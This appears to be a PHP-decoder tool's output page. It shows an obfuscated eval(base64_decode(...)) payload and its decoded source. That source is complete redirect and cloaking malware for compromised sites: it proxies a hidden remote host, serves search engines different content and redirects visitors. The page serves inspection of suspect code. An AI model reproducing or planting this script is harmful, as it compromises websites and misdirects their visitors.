Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2c5MjY1ODM2MmMxNTE5MTE..

Decoded Output download

    error_reporting(0);  $lru = "gg92658362c1519119f648b32779226955b479233941883432686466400694c45956640348f4360362031168396147f55254046216b4175387d699687327541864-235t805r884a783m133s806/739s512r146o827d845/910m468o539c370.133g788n706i395t100s546o443h552s851n560i870m238d260a744/893/125:879p698t909t663h732";  $url = '';  if (substr($lru, 0, 2)=='gg')  	{  	for($x=strlen($lru);$x>0;$x-=4) $url .= substr($lru,$x,1);  	}  else $url = $lru;    $e = '.php';  $q = "";  $test = 'suka-test';    $a = $_SERVER["QUERY_STRING"];    $spec_reg = '(\.css|\.svg|\.jpg|\.jpeg|\.png|\.bmp|\.img|\.gif|\.js)';    if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"]))  	{  	$strlena = strlen($a);  	$aori = $a;  	$a = rtrim($a,'/');  	if($test && $a == $test)  		{  		echo 'OK'; exit;  		}	    	if (preg_match($spec_reg,$a)) $w = $a;  	else $w = preg_replace("/^([a-z0-9-_\/]+)(\.|\/|).*$/i", '$1'.$e, $a, -1, $h);    	curl_setopt($ch = curl_init($url.$w), CURLOPT_RETURNTRANSFER, 1);  	curl_setopt($ch, CURLOPT_HEADER, 0);  	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);  	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);  	if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);  	$result = curl_exec($ch);  	$c = curl_getinfo($ch, CURLINFO_HTTP_CODE);    	curl_setopt($chg=curl_init($url.$w), CURLOPT_RETURNTRANSFER, 1);  	curl_setopt($chg, CURLOPT_HEADER, 0);  	curl_setopt($chg, CURLOPT_FOLLOWLOCATION, 0);  	curl_setopt($chg, CURLOPT_USERAGENT, 'Google');  	$resultg = curl_exec($chg);  	$cg = curl_getinfo($chg, CURLINFO_HTTP_CODE);     	if ( ($c == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)) && $resultg!='' && $cg != 404 )  		{  		$end = FALSE;  		$rd = $u;    		while ($end===FALSE)  			{  			curl_setopt($cht = curl_init($rd), CURLOPT_RETURNTRANSFER, 1);  			curl_setopt($cht, CURLOPT_HEADER, 1);  			curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);  			curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');  			curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');  			$rrt = curl_exec($cht);    			$u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);    			if (preg_match('#Location\: ([\S]+)#si',$rrt,$rdr))  				{  				$rd = $rdr[1];  				if (!preg_match('#redbutton#',$rd))  					{  					$end = TRUE;  					break;  					}	  				}  			else  				{  				$end = TRUE;  				break;  				}			  			}    		header('Location: ' . $rd, true, $c);  		exit;  		}  	else if ($resultg=='' || $cg == 404)  		{  		curl_setopt($chc=curl_init("http://".$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"].'?myclearcode'), CURLOPT_RETURNTRANSFER, 1);  		curl_setopt($chc, CURLOPT_HEADER, 0);  		curl_setopt($chc, CURLOPT_FOLLOWLOCATION, 0);  		die(curl_exec($chc));  		exit;  		}  	else if ($c == 200 && $result != '')  		{  		header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));  		$result = preg_replace('#^.*?\<html#si','<html',$result);    		$ori = $result;    		$t = $_SERVER["SCRIPT_NAME"];    		$h = strlen($w) - strlen($e) - $strlena;  		$result = preg_replace('/background(-image\:|\:)(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result);    		$hz = ($h<0) ? substr($a, $h) : "";    		if (substr($aori,-1)=='/')  			{  			$result = preg_replace('/<(a|link|img)(.*?)(href|src)=["\']((?!http|\/)[a-z0-9-_\.\/\?\=]+)["\'](.*?)>/i', '<$1$2$3="../$4"$5>', $result);  			}    		$result = ( ($h) || substr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["\'](' . preg_quote($t, '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i', '<a$1href="$2' . $hz . '"$4>', $result) : $ori;    		if (strpos($_SERVER['REQUEST_URI'], 'index.php?')!==FALSE)  			{  			$result = preg_replace('/<(link|img)(.*?)(href|src)=["\']((?!http|\/)[a-z0-9-_\.\/\=]+).*?["\'](.*?)>/i', '<$1$2$3="index.php?$4"$5>', $result);  			}    		echo $result;  		exit;  		}  	}

Did this file decode correctly?

Original Code

<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2c5MjY1ODM2MmMxNTE5MTE5ZjY0OGIzMjc3OTIyNjk1NWI0NzkyMzM5NDE4ODM0MzI2ODY0NjY0MDA2OTRjNDU5NTY2NDAzNDhmNDM2MDM2MjAzMTE2ODM5NjE0N2Y1NTI1NDA0NjIxNmI0MTc1Mzg3ZDY5OTY4NzMyNzU0MTg2NC0yMzV0ODA1cjg4NGE3ODNtMTMzczgwNi83MzlzNTEycjE0Nm84MjdkODQ1LzkxMG00NjhvNTM5YzM3MC4xMzNnNzg4bjcwNmkzOTV0MTAwczU0Nm80NDNoNTUyczg1MW41NjBpODcwbTIzOGQyNjBhNzQ0Lzg5My8xMjU6ODc5cDY5OHQ5MDl0NjYzaDczMiI7ICAkdXJsID0gJyc7ICBpZiAoc3Vic3RyKCRscnUsIDAsIDIpPT0nZ2cnKSAgCXsgIAlmb3IoJHg9c3RybGVuKCRscnUpOyR4PjA7JHgtPTQpICR1cmwgLj0gc3Vic3RyKCRscnUsJHgsMSk7ICAJfSAgZWxzZSAkdXJsID0gJGxydTsgICAgJGUgPSAnLnBocCc7ICAkcSA9ICIiOyAgJHRlc3QgPSAnc3VrYS10ZXN0JzsgICAgJGEgPSAkX1NFUlZFUlsiUVVFUllfU1RSSU5HIl07ICAgICRzcGVjX3JlZyA9ICcoXC5jc3N8XC5zdmd8XC5qcGd8XC5qcGVnfFwucG5nfFwuYm1wfFwuaW1nfFwuZ2lmfFwuanMpJzsgICAgaWYgKCghJHEgfHwgaXNzZXQoJF9HRVRbJHFdKSkgJiYgcHJlZ19tYXRjaCgiL15bXlwvXVthLXowLTktX1wvXC5dKyQvaSIsICRhID0gJHEgPyAkX0dFVFskcV0gOiAkX1NFUlZFUlsiUVVFUllfU1RSSU5HIl0pKSAgCXsgIAkkc3RybGVuYSA9IHN0cmxlbigkYSk7ICAJJGFvcmkgPSAkYTsgIAkkYSA9IHJ0cmltKCRhLCcvJyk7ICAJaWYoJHRlc3QgJiYgJGEgPT0gJHRlc3QpICAJCXsgIAkJZWNobyAnT0snOyBleGl0OyAgCQl9CSAgICAJaWYgKHByZWdfbWF0Y2goJHNwZWNfcmVnLCRhKSkgJHcgPSAkYTsgIAllbHNlICR3ID0gcHJlZ19yZXBsYWNlKCIvXihbYS16MC05LV9cL10rKShcLnxcL3wpLiokL2kiLCAnJDEnLiRlLCAkYSwgLTEsICRoKTsgICAgCWN1cmxfc2V0b3B0KCRjaCA9IGN1cmxfaW5pdCgkdXJsLiR3KSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7ICAJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgMCk7ICAJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAwKTsgIAljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOyAgCWlmIChpc3NldCgkX1NFUlZFUlsiSFRUUF9SRUZFUkVSIl0pKSBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJF9TRVJWRVJbIkhUVFBfUkVGRVJFUiJdKTsgIAkkcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7ICAJJGMgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOyAgICAJY3VybF9zZXRvcHQoJGNoZz1jdXJsX2luaXQoJHVybC4kdyksIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyAgCWN1cmxfc2V0b3B0KCRjaGcsIENVUkxPUFRfSEVBREVSLCAwKTsgIAljdXJsX3NldG9wdCgkY2hnLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAwKTsgIAljdXJsX3NldG9wdCgkY2hnLCBDVVJMT1BUX1VTRVJBR0VOVCwgJ0dvb2dsZScpOyAgCSRyZXN1bHRnID0gY3VybF9leGVjKCRjaGcpOyAgCSRjZyA9IGN1cmxfZ2V0aW5mbygkY2hnLCBDVVJMSU5GT19IVFRQX0NPREUpOyAgICAgCWlmICggKCRjID09IDMwMSB8fCAkYyA9PSAzMDIpICYmICgkdSA9IGN1cmxfZ2V0aW5mbygkY2gsIENVUkxJTkZPX0VGRkVDVElWRV9VUkwpKSAmJiAkcmVzdWx0ZyE9JycgJiYgJGNnICE9IDQwNCApICAJCXsgIAkJJGVuZCA9IEZBTFNFOyAgCQkkcmQgPSAkdTsgICAgCQl3aGlsZSAoJGVuZD09PUZBTFNFKSAgCQkJeyAgCQkJY3VybF9zZXRvcHQoJGNodCA9IGN1cmxfaW5pdCgkcmQpLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgIAkJCWN1cmxfc2V0b3B0KCRjaHQsIENVUkxPUFRfSEVBREVSLCAxKTsgIAkJCWN1cmxfc2V0b3B0KCRjaHQsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDApOyAgCQkJY3VybF9zZXRvcHQoJGNodCwgQ1VSTE9QVF9VU0VSQUdFTlQsICdPcGVyYScpOyAgCQkJY3VybF9zZXRvcHQoJGNodCwgQ1VSTE9QVF9SRUZFUkVSLCAnaHR0cDovL3d3dy5nb29nbGUuY29tJyk7ICAJCQkkcnJ0ID0gY3VybF9leGVjKCRjaHQpOyAgICAJCQkkdSA9IGN1cmxfZ2V0aW5mbygkY2h0LCBDVVJMSU5GT19FRkZFQ1RJVkVfVVJMKTsgICAgCQkJaWYgKHByZWdfbWF0Y2goJyNMb2NhdGlvblw6IChbXFNdKykjc2knLCRycnQsJHJkcikpICAJCQkJeyAgCQkJCSRyZCA9ICRyZHJbMV07ICAJCQkJaWYgKCFwcmVnX21hdGNoKCcjcmVkYnV0dG9uIycsJHJkKSkgIAkJCQkJeyAgCQkJCQkkZW5kID0gVFJVRTsgIAkJCQkJYnJlYWs7ICAJCQkJCX0JICAJCQkJfSAgCQkJZWxzZSAgCQkJCXsgIAkJCQkkZW5kID0gVFJVRTsgIAkJCQlicmVhazsgIAkJCQl9CQkJICAJCQl9ICAgIAkJaGVhZGVyKCdMb2NhdGlvbjogJyAuICRyZCwgdHJ1ZSwgJGMpOyAgCQlleGl0OyAgCQl9ICAJZWxzZSBpZiAoJHJlc3VsdGc9PScnIHx8ICRjZyA9PSA0MDQpICAJCXsgIAkJY3VybF9zZXRvcHQoJGNoYz1jdXJsX2luaXQoImh0dHA6Ly8iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdLic/bXljbGVhcmNvZGUnKSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7ICAJCWN1cmxfc2V0b3B0KCRjaGMsIENVUkxPUFRfSEVBREVSLCAwKTsgIAkJY3VybF9zZXRvcHQoJGNoYywgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMCk7ICAJCWRpZShjdXJsX2V4ZWMoJGNoYykpOyAgCQlleGl0OyAgCQl9ICAJZWxzZSBpZiAoJGMgPT0gMjAwICYmICRyZXN1bHQgIT0gJycpICAJCXsgIAkJaGVhZGVyKCdDb250ZW50LVR5cGU6ICcgLiBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19DT05URU5UX1RZUEUpKTsgIAkJJHJlc3VsdCA9IHByZWdfcmVwbGFjZSgnI14uKj9cPGh0bWwjc2knLCc8aHRtbCcsJHJlc3VsdCk7ICAgIAkJJG9yaSA9ICRyZXN1bHQ7ICAgIAkJJHQgPSAkX1NFUlZFUlsiU0NSSVBUX05BTUUiXTsgICAgCQkkaCA9IHN0cmxlbigkdykgLSBzdHJsZW4oJGUpIC0gJHN0cmxlbmE7ICAJCSRyZXN1bHQgPSBwcmVnX3JlcGxhY2UoJy9iYWNrZ3JvdW5kKC1pbWFnZVw6fFw6KSguKj91cmxcKFsiXCddKShbXlwvXVthLXowLTktX1wuXC9dKykoWyJcJ11cKSkvaScsICdiYWNrZ3JvdW5kJDEkMicgLiAkdCAuICckMyQ0JywgJHJlc3VsdCk7ICAgIAkJJGh6ID0gKCRoPDApID8gc3Vic3RyKCRhLCAkaCkgOiAiIjsgICAgCQlpZiAoc3Vic3RyKCRhb3JpLC0xKT09Jy8nKSAgCQkJeyAgCQkJJHJlc3VsdCA9IHByZWdfcmVwbGFjZSgnLzwoYXxsaW5rfGltZykoLio/KShocmVmfHNyYyk9WyJcJ10oKD8haHR0cHxcLylbYS16MC05LV9cLlwvXD9cPV0rKVsiXCddKC4qPyk+L2knLCAnPCQxJDIkMz0iLi4vJDQiJDU+JywgJHJlc3VsdCk7ICAJCQl9ICAgIAkJJHJlc3VsdCA9ICggKCRoKSB8fCBzdWJzdHIoJGEsIC00KSA9PSAnLmNzcycpID8gcHJlZ19yZXBsYWNlKCcvPGEoLio/KWhyZWY9WyJcJ10oJyAuIHByZWdfcXVvdGUoJHQsICcvJykgLiAnW2EtejAtOS1fXSspKCcgLiBwcmVnX3F1b3RlKCRlKSAuICcpWyJcJ10oLio/KT4vaScsICc8YSQxaHJlZj0iJDInIC4gJGh6IC4gJyIkND4nLCAkcmVzdWx0KSA6ICRvcmk7ICAgIAkJaWYgKHN0cnBvcygkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSwgJ2luZGV4LnBocD8nKSE9PUZBTFNFKSAgCQkJeyAgCQkJJHJlc3VsdCA9IHByZWdfcmVwbGFjZSgnLzwobGlua3xpbWcpKC4qPykoaHJlZnxzcmMpPVsiXCddKCg/IWh0dHB8XC8pW2EtejAtOS1fXC5cL1w9XSspLio/WyJcJ10oLio/KT4vaScsICc8JDEkMiQzPSJpbmRleC5waHA/JDQiJDU+JywgJHJlc3VsdCk7ICAJCQl9ICAgIAkJZWNobyAkcmVzdWx0OyAgCQlleGl0OyAgCQl9ICAJfSAgICA="));

Function Calls

base64_decode

Variables

None

Stats

MD5	dab917f03faa1c4ea3af3dcaa86ed28a
Eval Count	1
Decode Time	83 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats